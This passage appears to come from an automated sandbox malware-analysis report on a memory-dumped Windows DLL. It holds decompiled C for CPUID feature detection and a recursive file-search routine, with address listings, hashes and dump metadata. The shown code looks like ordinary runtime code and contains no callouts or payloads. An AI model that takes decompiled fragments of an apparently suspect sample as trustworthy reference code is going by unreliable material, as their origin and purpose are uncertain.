				 *0x736ef48c =  *0x736ef48c & 0x00000000;
				 *0x736eb010 =  *0x736eb010 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v12 = _v28 ^ 0x49656e69;
				_v8 = _v36 ^ 0x756e6547;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v32 ^ 0x6c65746e | _v12) != 0) {
					L9:
					_t96 =  *0x736ef490; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x736ef490 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x736eb010; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x736ef48c = 1;
					 *0x736eb010 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x736ef48c = 2;
						 *0x736eb010 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x736eb010; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x736ef48c = 3;
								 *0x736eb010 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x736ef48c = 5;
									 *0x736eb010 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x736eb010 =  *0x736eb010 | 0x00000040;
										 *0x736ef48c = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0x736ef490; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0x736ef490 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}






























                                                                                                                                                                                                                                0x736d78d7
                                                                                                                                                                                                                                0x736d78da
                                                                                                                                                                                                                                0x736d78e4
                                                                                                                                                                                                                                0x736d78f5
                                                                                                                                                                                                                                0x736d7aa4
                                                                                                                                                                                                                                0x736d7aa7
                                                                                                                                                                                                                                0x736d7aa7
                                                                                                                                                                                                                                0x736d78fb
                                                                                                                                                                                                                                0x736d7901
                                                                                                                                                                                                                                0x736d7906
                                                                                                                                                                                                                                0x736d790a
                                                                                                                                                                                                                                0x736d790e
                                                                                                                                                                                                                                0x736d790f
                                                                                                                                                                                                                                0x736d7911
                                                                                                                                                                                                                                0x736d7914
                                                                                                                                                                                                                                0x736d7919
                                                                                                                                                                                                                                0x736d7922
                                                                                                                                                                                                                                0x736d7933
                                                                                                                                                                                                                                0x736d793e
                                                                                                                                                                                                                                0x736d7944
                                                                                                                                                                                                                                0x736d7945
                                                                                                                                                                                                                                0x736d794a
                                                                                                                                                                                                                                0x736d794d
                                                                                                                                                                                                                                0x736d7952
                                                                                                                                                                                                                                0x736d795a
                                                                                                                                                                                                                                0x736d795d
                                                                                                                                                                                                                                0x736d7960
                                                                                                                                                                                                                                0x736d79a5
                                                                                                                                                                                                                                0x736d79a5
                                                                                                                                                                                                                                0x736d79ab
                                                                                                                                                                                                                                0x736d79ab
                                                                                                                                                                                                                                0x736d79b0
                                                                                                                                                                                                                                0x736d79b1
                                                                                                                                                                                                                                0x736d79b7
                                                                                                                                                                                                                                0x736d79e8
                                                                                                                                                                                                                                0x736d79b9
                                                                                                                                                                                                                                0x736d79bb
                                                                                                                                                                                                                                0x736d79bc
                                                                                                                                                                                                                                0x736d79c1
                                                                                                                                                                                                                                0x736d79c4
                                                                                                                                                                                                                                0x736d79c6
                                                                                                                                                                                                                                0x736d79c9
                                                                                                                                                                                                                                0x736d79cc
                                                                                                                                                                                                                                0x736d79cf
                                                                                                                                                                                                                                0x736d79d2
                                                                                                                                                                                                                                0x736d79db
                                                                                                                                                                                                                                0x736d79e0
                                                                                                                                                                                                                                0x736d79e0
                                                                                                                                                                                                                                0x736d79db
                                                                                                                                                                                                                                0x736d79eb
                                                                                                                                                                                                                                0x736d79f0
                                                                                                                                                                                                                                0x736d79f3
                                                                                                                                                                                                                                0x736d79fd
                                                                                                                                                                                                                                0x736d7a08
                                                                                                                                                                                                                                0x736d7a0e
                                                                                                                                                                                                                                0x736d7a11
                                                                                                                                                                                                                                0x736d7a1b
                                                                                                                                                                                                                                0x736d7a26
                                                                                                                                                                                                                                0x736d7a32
                                                                                                                                                                                                                                0x736d7a35
                                                                                                                                                                                                                                0x736d7a38
                                                                                                                                                                                                                                0x736d7a43
                                                                                                                                                                                                                                0x736d7a48
                                                                                                                                                                                                                                0x736d7a4a
                                                                                                                                                                                                                                0x736d7a4f
                                                                                                                                                                                                                                0x736d7a52
                                                                                                                                                                                                                                0x736d7a5c
                                                                                                                                                                                                                                0x736d7a64
                                                                                                                                                                                                                                0x736d7a69
                                                                                                                                                                                                                                0x736d7a73
                                                                                                                                                                                                                                0x736d7a81
                                                                                                                                                                                                                                0x736d7a94
                                                                                                                                                                                                                                0x736d7a9b
                                                                                                                                                                                                                                0x736d7a9b
                                                                                                                                                                                                                                0x736d7a81
                                                                                                                                                                                                                                0x736d7a64
                                                                                                                                                                                                                                0x736d7a48
                                                                                                                                                                                                                                0x736d7a26
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7aa3
                                                                                                                                                                                                                                0x736d7965
                                                                                                                                                                                                                                0x736d796f
                                                                                                                                                                                                                                0x736d7994
                                                                                                                                                                                                                                0x736d799a
                                                                                                                                                                                                                                0x736d799d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 736D78ED
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2325560087-0
                                                                                                                                                                                                                                • Opcode ID: b49cf25cf1d6181b43e35d439e91cd8c151c881458da6c7a0b15498ab89c86f0
                                                                                                                                                                                                                                • Instruction ID: 3bfbb076308cc8d32f23990a486e9b4c1090027ee91166f7ef8ac2a5e8bb4a98
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b49cf25cf1d6181b43e35d439e91cd8c151c881458da6c7a0b15498ab89c86f0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E851D0B3A55209CFEB05CF56C585BAEB7F4FB48304F28856AD41AEB284D3749A08CF51
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736DA676, Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                			E736DA676(void* __ecx, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				union _FINDEX_INFO_LEVELS _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _v48;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				intOrPtr* _v612;
				union _FINDEX_INFO_LEVELS _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				signed int _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				signed int _v644;
				union _FINDEX_INFO_LEVELS _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				signed int _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				void* __ebx;
				void* __edi;
				intOrPtr _t68;
				signed int _t73;
				signed int _t75;
				char _t77;
				signed char _t78;
				signed int _t84;
				signed int _t94;
				signed int _t97;
				union _FINDEX_INFO_LEVELS _t98;
				union _FINDEX_INFO_LEVELS _t100;
				intOrPtr* _t106;
				signed int _t109;
				intOrPtr _t116;
				signed int _t118;
				signed int _t121;
				signed int _t123;
				void* _t126;
				union _FINDEX_INFO_LEVELS _t127;
				void* _t128;
				intOrPtr* _t130;
				intOrPtr* _t133;
				signed int _t135;
				intOrPtr* _t138;
				signed int _t143;
				signed int _t149;
				void* _t155;
				signed int _t158;
				intOrPtr _t160;
				void* _t161;
				void* _t165;
				void* _t166;
				signed int _t167;
				signed int _t170;
				void* _t171;
				signed int _t172;
				void* _t173;
				void* _t174;

				_push(__ecx);
				_t133 = _a4;
				_t2 = _t133 + 1; // 0x1
				_t155 = _t2;
				do {
					_t68 =  *_t133;
					_t133 = _t133 + 1;
				} while (_t68 != 0);
				_t158 = _a12;
				_t135 = _t133 - _t155 + 1;
				_v8 = _t135;
				if(_t135 <=  !_t158) {
					_push(__esi);
					_t5 = _t158 + 1; // 0x1
					_t126 = _t5 + _t135;
					_t165 = E736DA236(_t126, 1);
					__eflags = _t158;
					if(_t158 == 0) {
						L7:
						_push(_v8);
						_t126 = _t126 - _t158;
						_t73 = E736DD1A7(_t165 + _t158, _t126, _a4);
						_t172 = _t171 + 0x10;
						__eflags = _t73;
						if(_t73 != 0) {
							goto L12;
						} else {
							_t130 = _a16;
							_t118 = E736DAA77(_t130);
							_v8 = _t118;
							__eflags = _t118;
							if(_t118 == 0) {
								 *( *(_t130 + 4)) = _t165;
								_t167 = 0;
								_t14 = _t130 + 4;
								 *_t14 =  *(_t130 + 4) + 4;
								__eflags =  *_t14;
							} else {
								E736DA293(_t165);
								_t167 = _v8;
							}
							E736DA293(0);
							_t121 = _t167;
							goto L4;
						}
					} else {
						_push(_t158);
						_t123 = E736DD1A7(_t165, _t126, _a8);
						_t172 = _t171 + 0x10;
						__eflags = _t123;
						if(_t123 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E736DA176();
							asm("int3");
							_t170 = _t172;
							_t173 = _t172 - 0x298;
							_t75 =  *0x736eb004; // 0xa11be602
							_v48 = _t75 ^ _t170;
							_t138 = _v32;
							_t156 = _v28;
							_push(_t126);
							_push(0);
							_t160 = _v36;
							_v648 = _t156;
							__eflags = _t138 - _t160;
							if(_t138 != _t160) {
								while(1) {
									_t116 =  *_t138;
									__eflags = _t116 - 0x2f;
									if(_t116 == 0x2f) {
										break;
									}
									__eflags = _t116 - 0x5c;
									if(_t116 != 0x5c) {
										__eflags = _t116 - 0x3a;
										if(_t116 != 0x3a) {
											_t138 = E736DD200(_t160, _t138);
											__eflags = _t138 - _t160;
											if(_t138 != _t160) {
												continue;
											}
										}
									}
									break;
								}
								_t156 = _v612;
							}
							_t77 =  *_t138;
							_v605 = _t77;
							__eflags = _t77 - 0x3a;
							if(_t77 != 0x3a) {
								L23:
								_t127 = 0;
								__eflags = _t77 - 0x2f;
								if(__eflags == 0) {
									L26:
									_t78 = 1;
								} else {
									__eflags = _t77 - 0x5c;
									if(__eflags == 0) {
										goto L26;
									} else {
										__eflags = _t77 - 0x3a;
										_t78 = 0;
										if(__eflags == 0) {
											goto L26;
										}
									}
								}
								_v672 = _t127;
								_v668 = _t127;
								_push(_t165);
								asm("sbb eax, eax");
								_v664 = _t127;
								_v660 = _t127;
								_v640 =  ~(_t78 & 0x000000ff) & _t138 - _t160 + 0x00000001;
								_v656 = _t127;
								_v652 = _t127;
								_t84 = E736DA466(_t138 - _t160 + 1, _t160,  &_v672, E736DA982(_t156, __eflags));
								_t174 = _t173 + 0xc;
								asm("sbb eax, eax");
								_t166 = FindFirstFileExW( !( ~_t84) & _v664, _t127,  &_v604, _t127, _t127, _t127);
								__eflags = _t166 - 0xffffffff;
								if(_t166 != 0xffffffff) {
									_t143 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
									__eflags = _t143;
									_t144 = _t143 >> 2;
									_v644 = _t143 >> 2;
									do {
										_v636 = _t127;
										_v632 = _t127;
										_v628 = _t127;
										_v624 = _t127;
										_v620 = _t127;
										_v616 = _t127;
										_t94 = E736DA397( &(_v604.cFileName),  &_v636,  &_v605, E736DA982(_t156, __eflags));
										_t174 = _t174 + 0x10;
										asm("sbb eax, eax");
										_t97 =  !( ~_t94) & _v628;
										__eflags =  *_t97 - 0x2e;
										if( *_t97 != 0x2e) {
											L34:
											_push(_v612);
											_t98 = E736DA676(_t144, _t166, _t97, _t160, _v640);
											_t174 = _t174 + 0x10;
											_v648 = _t98;
											__eflags = _t98;
											if(_t98 != 0) {
												__eflags = _v616 - _t127;
												if(_v616 != _t127) {
													E736DA293(_v628);
													_t98 = _v648;
												}
												_t127 = _t98;
											} else {
												goto L35;
											}
										} else {
											_t144 =  *((intOrPtr*)(_t97 + 1));
											__eflags = _t144;
											if(_t144 == 0) {
												goto L35;
											} else {
												__eflags = _t144 - 0x2e;
												if(_t144 != 0x2e) {
													goto L34;
												} else {
													__eflags =  *((intOrPtr*)(_t97 + 2)) - _t127;
													if( *((intOrPtr*)(_t97 + 2)) == _t127) {
														goto L35;
													} else {
														goto L34;
													}
												}
											}
										}
										L43:
										FindClose(_t166);
										goto L44;
										L35:
										__eflags = _v616 - _t127;
										if(_v616 != _t127) {
											E736DA293(_v628);
											_pop(_t144);
										}
										__eflags = FindNextFileW(_t166,  &_v604);
									} while (__eflags != 0);
									_t106 = _v612;
									_t149 = _v644;
									_t156 =  *_t106;
									_t109 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 2;
									__eflags = _t149 - _t109;
									if(_t149 != _t109) {
										E736DCCB0(_t156, _t156 + _t149 * 4, _t109 - _t149, 4, E736DA2CD);
									}
									goto L43;
								} else {
									_push(_v612);
									_t127 = E736DA676( &_v604, _t166, _t160, _t127, _t127);
								}
								L44:
								__eflags = _v652;
								_pop(_t165);
								if(_v652 != 0) {
									E736DA293(_v664);
								}
								_t100 = _t127;
							} else {
								__eflags = _t138 - _t160 + 1;
								if(_t138 == _t160 + 1) {
									_t77 = _v605;
									goto L23;
								} else {
									_push(_t156);
									_t100 = E736DA676(_t138, _t165, _t160, 0, 0);
								}
							}
							_pop(_t161);
							__eflags = _v12 ^ _t170;
							_pop(_t128);
							return E736D6EA3(_t100, _t128, _v12 ^ _t170, _t156, _t161, _t165);
						} else {
							goto L7;
						}
					}
				} else {
					_t121 = 0xc;
					L4:
					return _t121;
				}
			}


































































                                                                                                                                                                                                                                0x736da67b
                                                                                                                                                                                                                                0x736da67c
                                                                                                                                                                                                                                0x736da67f
                                                                                                                                                                                                                                0x736da67f
                                                                                                                                                                                                                                0x736da682
                                                                                                                                                                                                                                0x736da682
                                                                                                                                                                                                                                0x736da684
                                                                                                                                                                                                                                0x736da685
                                                                                                                                                                                                                                0x736da68a
                                                                                                                                                                                                                                0x736da691
                                                                                                                                                                                                                                0x736da694
                                                                                                                                                                                                                                0x736da699
                                                                                                                                                                                                                                0x736da6a4
                                                                                                                                                                                                                                0x736da6a5
                                                                                                                                                                                                                                0x736da6a8
                                                                                                                                                                                                                                0x736da6b2
                                                                                                                                                                                                                                0x736da6b6
                                                                                                                                                                                                                                0x736da6b8
                                                                                                                                                                                                                                0x736da6cc
                                                                                                                                                                                                                                0x736da6cc
                                                                                                                                                                                                                                0x736da6cf
                                                                                                                                                                                                                                0x736da6d9
                                                                                                                                                                                                                                0x736da6de
                                                                                                                                                                                                                                0x736da6e1
                                                                                                                                                                                                                                0x736da6e3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da6e5
                                                                                                                                                                                                                                0x736da6e5
                                                                                                                                                                                                                                0x736da6ea
                                                                                                                                                                                                                                0x736da6f1
                                                                                                                                                                                                                                0x736da6f4
                                                                                                                                                                                                                                0x736da6f6
                                                                                                                                                                                                                                0x736da707
                                                                                                                                                                                                                                0x736da709
                                                                                                                                                                                                                                0x736da70b
                                                                                                                                                                                                                                0x736da70b
                                                                                                                                                                                                                                0x736da70b
                                                                                                                                                                                                                                0x736da6f8
                                                                                                                                                                                                                                0x736da6f9
                                                                                                                                                                                                                                0x736da6fe
                                                                                                                                                                                                                                0x736da701
                                                                                                                                                                                                                                0x736da710
                                                                                                                                                                                                                                0x736da716
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da719
                                                                                                                                                                                                                                0x736da6ba
                                                                                                                                                                                                                                0x736da6ba
                                                                                                                                                                                                                                0x736da6c0
                                                                                                                                                                                                                                0x736da6c5
                                                                                                                                                                                                                                0x736da6c8
                                                                                                                                                                                                                                0x736da6ca
                                                                                                                                                                                                                                0x736da71c
                                                                                                                                                                                                                                0x736da71e
                                                                                                                                                                                                                                0x736da71f
                                                                                                                                                                                                                                0x736da720
                                                                                                                                                                                                                                0x736da721
                                                                                                                                                                                                                                0x736da722
                                                                                                                                                                                                                                0x736da723
                                                                                                                                                                                                                                0x736da728
                                                                                                                                                                                                                                0x736da72c
                                                                                                                                                                                                                                0x736da72e
                                                                                                                                                                                                                                0x736da734
                                                                                                                                                                                                                                0x736da73b
                                                                                                                                                                                                                                0x736da73e
                                                                                                                                                                                                                                0x736da741
                                                                                                                                                                                                                                0x736da744
                                                                                                                                                                                                                                0x736da745
                                                                                                                                                                                                                                0x736da746
                                                                                                                                                                                                                                0x736da749
                                                                                                                                                                                                                                0x736da74f
                                                                                                                                                                                                                                0x736da751
                                                                                                                                                                                                                                0x736da753
                                                                                                                                                                                                                                0x736da753
                                                                                                                                                                                                                                0x736da755
                                                                                                                                                                                                                                0x736da757
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da759
                                                                                                                                                                                                                                0x736da75b
                                                                                                                                                                                                                                0x736da75d
                                                                                                                                                                                                                                0x736da75f
                                                                                                                                                                                                                                0x736da76a
                                                                                                                                                                                                                                0x736da76c
                                                                                                                                                                                                                                0x736da76e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da76e
                                                                                                                                                                                                                                0x736da75f
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da75b
                                                                                                                                                                                                                                0x736da770
                                                                                                                                                                                                                                0x736da770
                                                                                                                                                                                                                                0x736da776
                                                                                                                                                                                                                                0x736da778
                                                                                                                                                                                                                                0x736da77e
                                                                                                                                                                                                                                0x736da780
                                                                                                                                                                                                                                0x736da7a2
                                                                                                                                                                                                                                0x736da7a2
                                                                                                                                                                                                                                0x736da7a4
                                                                                                                                                                                                                                0x736da7a6
                                                                                                                                                                                                                                0x736da7b2
                                                                                                                                                                                                                                0x736da7b2
                                                                                                                                                                                                                                0x736da7a8
                                                                                                                                                                                                                                0x736da7a8
                                                                                                                                                                                                                                0x736da7aa
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da7ac
                                                                                                                                                                                                                                0x736da7ac
                                                                                                                                                                                                                                0x736da7ae
                                                                                                                                                                                                                                0x736da7b0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da7b0
                                                                                                                                                                                                                                0x736da7aa
                                                                                                                                                                                                                                0x736da7ba
                                                                                                                                                                                                                                0x736da7c2
                                                                                                                                                                                                                                0x736da7c8
                                                                                                                                                                                                                                0x736da7c9
                                                                                                                                                                                                                                0x736da7cb
                                                                                                                                                                                                                                0x736da7d3
                                                                                                                                                                                                                                0x736da7d9
                                                                                                                                                                                                                                0x736da7df
                                                                                                                                                                                                                                0x736da7e5
                                                                                                                                                                                                                                0x736da7f9
                                                                                                                                                                                                                                0x736da7fe
                                                                                                                                                                                                                                0x736da809
                                                                                                                                                                                                                                0x736da81f
                                                                                                                                                                                                                                0x736da821
                                                                                                                                                                                                                                0x736da824
                                                                                                                                                                                                                                0x736da847
                                                                                                                                                                                                                                0x736da847
                                                                                                                                                                                                                                0x736da849
                                                                                                                                                                                                                                0x736da84c
                                                                                                                                                                                                                                0x736da852
                                                                                                                                                                                                                                0x736da852
                                                                                                                                                                                                                                0x736da858
                                                                                                                                                                                                                                0x736da85e
                                                                                                                                                                                                                                0x736da864
                                                                                                                                                                                                                                0x736da86a
                                                                                                                                                                                                                                0x736da870
                                                                                                                                                                                                                                0x736da891
                                                                                                                                                                                                                                0x736da896
                                                                                                                                                                                                                                0x736da89b
                                                                                                                                                                                                                                0x736da89f
                                                                                                                                                                                                                                0x736da8a5
                                                                                                                                                                                                                                0x736da8a8
                                                                                                                                                                                                                                0x736da8bb
                                                                                                                                                                                                                                0x736da8bb
                                                                                                                                                                                                                                0x736da8c9
                                                                                                                                                                                                                                0x736da8ce
                                                                                                                                                                                                                                0x736da8d1
                                                                                                                                                                                                                                0x736da8d7
                                                                                                                                                                                                                                0x736da8d9
                                                                                                                                                                                                                                0x736da937
                                                                                                                                                                                                                                0x736da93d
                                                                                                                                                                                                                                0x736da945
                                                                                                                                                                                                                                0x736da94a
                                                                                                                                                                                                                                0x736da950
                                                                                                                                                                                                                                0x736da951
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da8aa
                                                                                                                                                                                                                                0x736da8aa
                                                                                                                                                                                                                                0x736da8ad
                                                                                                                                                                                                                                0x736da8af
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da8b1
                                                                                                                                                                                                                                0x736da8b1
                                                                                                                                                                                                                                0x736da8b4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da8b6
                                                                                                                                                                                                                                0x736da8b6
                                                                                                                                                                                                                                0x736da8b9
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da8b9
                                                                                                                                                                                                                                0x736da8b4
                                                                                                                                                                                                                                0x736da8af
                                                                                                                                                                                                                                0x736da953
                                                                                                                                                                                                                                0x736da954
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da8db
                                                                                                                                                                                                                                0x736da8db
                                                                                                                                                                                                                                0x736da8e1
                                                                                                                                                                                                                                0x736da8e9
                                                                                                                                                                                                                                0x736da8ee
                                                                                                                                                                                                                                0x736da8ee
                                                                                                                                                                                                                                0x736da8fd
                                                                                                                                                                                                                                0x736da8fd
                                                                                                                                                                                                                                0x736da905
                                                                                                                                                                                                                                0x736da90b
                                                                                                                                                                                                                                0x736da911
                                                                                                                                                                                                                                0x736da918
                                                                                                                                                                                                                                0x736da91b
                                                                                                                                                                                                                                0x736da91d
                                                                                                                                                                                                                                0x736da92d
                                                                                                                                                                                                                                0x736da932
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da826
                                                                                                                                                                                                                                0x736da826
                                                                                                                                                                                                                                0x736da837
                                                                                                                                                                                                                                0x736da837
                                                                                                                                                                                                                                0x736da95a
                                                                                                                                                                                                                                0x736da95a
                                                                                                                                                                                                                                0x736da961
                                                                                                                                                                                                                                0x736da962
                                                                                                                                                                                                                                0x736da96a
                                                                                                                                                                                                                                0x736da96f
                                                                                                                                                                                                                                0x736da970
                                                                                                                                                                                                                                0x736da782
                                                                                                                                                                                                                                0x736da785
                                                                                                                                                                                                                                0x736da787
                                                                                                                                                                                                                                0x736da79c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da789
                                                                                                                                                                                                                                0x736da789
                                                                                                                                                                                                                                0x736da78f
                                                                                                                                                                                                                                0x736da794
                                                                                                                                                                                                                                0x736da787
                                                                                                                                                                                                                                0x736da975
                                                                                                                                                                                                                                0x736da976
                                                                                                                                                                                                                                0x736da978
                                                                                                                                                                                                                                0x736da981
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da6ca
                                                                                                                                                                                                                                0x736da69b
                                                                                                                                                                                                                                0x736da69d
                                                                                                                                                                                                                                0x736da69e
                                                                                                                                                                                                                                0x736da6a2
                                                                                                                                                                                                                                0x736da6a2

                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 3461e2c60e6d4c5939a134ba3cb52cde9107de1d4536251b3d6e8e61dfd9a7b8
                                                                                                                                                                                                                                • Instruction ID: 6563921d8747190b544969d9289332bf6585bf38bccdcf0ff43e51d73c7f8261
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3461e2c60e6d4c5939a134ba3cb52cde9107de1d4536251b3d6e8e61dfd9a7b8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA4190B5818218AFDF10DF79CD88BAABBB9AF45300F1442D9E41DD3390DA359E858F54
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D5BB0, Relevance: 1.6, Strings: 1, Instructions: 379COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: KERNEL32.dll
                                                                                                                                                                                                                                • API String ID: 0-254546324
                                                                                                                                                                                                                                • Opcode ID: 6ee296efeeb031930c4c1beb965e79c39e89d32f26540cbd19edd0221f735a65
                                                                                                                                                                                                                                • Instruction ID: 53fb52a3222fd25ad7b9994d07e140d175679334a84f0fac8ef09c4ac9e1e837
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ee296efeeb031930c4c1beb965e79c39e89d32f26540cbd19edd0221f735a65
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08F10472C607498AD317C637C451224F664AFAF284729D76BF10B3D8E6F729B4D2EA00
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D6620, Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                Download Yara Rule
